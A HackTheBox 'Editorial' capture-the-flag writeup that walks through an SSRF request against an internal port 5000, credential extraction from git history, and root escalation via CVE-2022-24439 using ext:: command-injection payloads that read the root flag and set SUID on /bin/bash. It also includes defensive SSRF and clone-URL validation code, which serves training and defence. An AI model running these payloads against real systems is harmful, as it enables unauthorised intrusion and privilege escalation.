HackTheBox Editorial Writeup

Explore the fundamentals of cybersecurity in the Editorial Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.20 editorial.htb

Script to add hosts automatically

ip="10.10.11.20"
domain="editorial.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV editorial.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-22 21:06 CEST
Nmap scan report for tiempoarriba.htb (10.10.11.20)
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editorial Tiempo Arriba
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploiting Port 5000 on editorial.htb

First, intercept the request to upload a file using Burp Suite by navigating to http://editorial.htb/upload.

Step 1: Brute Force Port 5000

Port 5000 was identified with Burp Suite's Repeater: the upload form's bookurl field is fetched by the server itself, so pointing it at http://127.0.0.1:5000/ reaches a service that is not exposed externally. By varying the path in that URL you can enumerate internal endpoints on port 5000. The resulting image preview is the fetched content, which you can then download and inspect.

Here’s an example request for the brute force:

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------345673946433514815222539054036
Content-Length: 365
Origin: http://editorial.htb
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://editorial.htb/upload
Priority: u=0

-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/
-----------------------------345673946433514815222539054036
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream

-----------------------------345673946433514815222539054036--
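The request above works because the server fetches whatever URL is placed in bookurl without checking where it points. The following is an added example (not code from the writeup or from the Editorial application) of the check a defender would put in front of such a fetch: it allows only http/https, rejects credentials in the URL, resolves the host, and refuses any address that is loopback, private, link-local, multicast or otherwise non-public, including IPv4 addresses hidden inside IPv6-mapped form. The function name `validate_book_url`, the `resolver` hook and the sample hosts are assumptions made for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example: allowlist-based validation for a server-side fetch of a user-supplied URL.
ALLOWED_SCHEMES = {"http", "https"}


def _default_resolver(host):
    """Resolve a hostname to every address it maps to (A and AAAA records)."""
    return sorted({info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)})


def _is_public_address(ip):
    """True only for addresses a server-side fetcher should be allowed to reach."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback once unwrapped
    if ip.is_multicast or ip.is_reserved or ip.is_unspecified:
        return False
    # is_global is False for loopback, RFC 1918, link-local, CGNAT and documentation ranges
    return ip.is_global


def validate_book_url(url, resolver=_default_resolver):
    """Return (allowed, reason) for a URL the server has been asked to fetch.

    `resolver` is a hook (assumed name) so the check can be tested without DNS.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"

    host = parts.hostname
    try:
        candidates = [ipaddress.ip_address(host)]  # literal IP: no DNS lookup needed
    except ValueError:
        try:
            candidates = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"could not resolve {host!r}: {exc}"
        if not candidates:
            return False, f"no addresses for {host!r}"

    # Every address the name resolves to must be public, not just the first one.
    for ip in candidates:
        if not _is_public_address(ip):
            return False, f"{host!r} resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs: the writeup's internal URL and a fake public host.
    print(validate_book_url("http://127.0.0.1:5000/"))
    print(validate_book_url("http://books.example/cover.jpg",
                            resolver=lambda h: ["93.184.216.34"]))
```

Two caveats for anyone wiring this into a real fetcher: the HTTP client must connect to the address that was validated (otherwise a name can resolve differently a moment later), and it must not follow redirects, since a public URL can redirect to 127.0.0.1:5000 just as easily.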

Step 2: Fetch and Inspect Files

Once you have discovered an endpoint this way, fetch the exposed file as follows. The file name is shown in the response to the POST /upload-cover request.

echo -n "Endpoint --> "
read -r endpoint
wget "http://editorial.htb/static/uploads/$endpoint"
jq . "$endpoint"        # pretty-print the fetched JSON
rm -f "$endpoint"

This will retrieve the file, which could reveal valuable information like additional API endpoints.

Step 3: Exploit Another Endpoint

Target endpoint http://127.0.0.1:5000/api/latest/metadata/messages/authors by following the same steps to extract sensitive information.

Step 4: SSH Access

Once you gather enough information, SSH into the editorial.htb server:

ssh dev@editorial.htb
cat user.txt

Step 5: Git Inspection

Navigate to the apps directory to inspect the git history and reset to a previous commit:

cd apps
git log
git reset --hard HEAD^  # Go back 1 commit
git log --all -p        # Show all commit diffs

Step 6: Extract Credentials

To automatically extract credentials from git commit diffs, use the following command:

echo -e "$(git log --all -p | grep -Eo "Username:.*|Password:.*" | awk 'NR==1{print; exit}')"

Step 7: Privilege Escalation

Switch to the prod user and check available sudo commands:

su prod
sudo -l

You will find:

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

Step 8: Exploiting GitPython CVE

Using CVE-2022-24439 (GitPython passing an attacker-controlled `ext::` URL to git, which executes it as a remote-helper command), exploit the sudo-permitted script to escalate privileges and read the root flag:

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'
cat /tmp/root

Getting an actual root shell

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c chmod% 4755% /bin/bash'
/bin/bash -p
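The root cause in Step 8 is that the clone script hands its argument to GitPython, and git's `helper::address` URL syntax (`ext::` in particular) turns that argument into a command. Upstream fixed this in GitPython 3.1.30 by refusing such URLs unless the caller opts in with `allow_unsafe_protocols=True`. The block below is an added example (not the clone_prod_change.py script, whose contents the writeup does not show, and not GitPython's own code) of the equivalent check a script like this should apply before cloning: only plain `https://` and `ssh://` URLs are accepted, remote-helper syntax and option-like arguments are rejected, and the resulting git command pins `protocol.ext.allow=never` as a second line of defence. The names `is_safe_clone_url` and `clone_argv` and the sample repository URLs are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Added example: hardening the URL handling of a privileged clone wrapper.

# git remote-helper syntax is "<helper>::<address>" (ext::, fd::, ...). Each of these
# hands the address to a helper program, so every form is rejected up front.
REMOTE_HELPER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.+-]*::")

# Assumed allowlist: the transports a deployment script legitimately needs.
ALLOWED_SCHEMES = {"https", "ssh"}


def is_safe_clone_url(url):
    """Return True only for a plain https:// or ssh:// URL with a host part."""
    if not isinstance(url, str) or not url or any(c.isspace() for c in url):
        return False
    if REMOTE_HELPER_RE.match(url):
        return False  # ext::, fd:: and any other remote helper
    if url.startswith("-"):
        return False  # would otherwise be parsed by git as an option
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False  # also rejects scp-style "user@host:path" shorthand
    return True


def clone_argv(url, dest):
    """Build the git command a hardened wrapper would run, or raise ValueError.

    protocol.ext.allow=never disables the ext:: helper even if a check is bypassed,
    and "--" stops the URL from being read as an option.
    """
    if not is_safe_clone_url(url):
        raise ValueError("refused to clone from unsafe URL")
    return ["git", "-c", "protocol.ext.allow=never", "clone", "--", url, dest]


if __name__ == "__main__":
    # Constructed sample inputs: a benign ext:: string and an ordinary https URL.
    print(is_safe_clone_url("ext::true"))
    print(clone_argv("https://git.example/org/repo.git", "/tmp/repo"))
```

With GitPython itself, the same effect comes from upgrading to 3.1.30 or later and leaving `allow_unsafe_protocols` at its default, but an explicit allowlist in the script is still worthwhile because the sudo rule shown in Step 7 lets the prod user pass any argument (`*`) to it as root.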

This post is licensed under CC BY 4.0 by the author.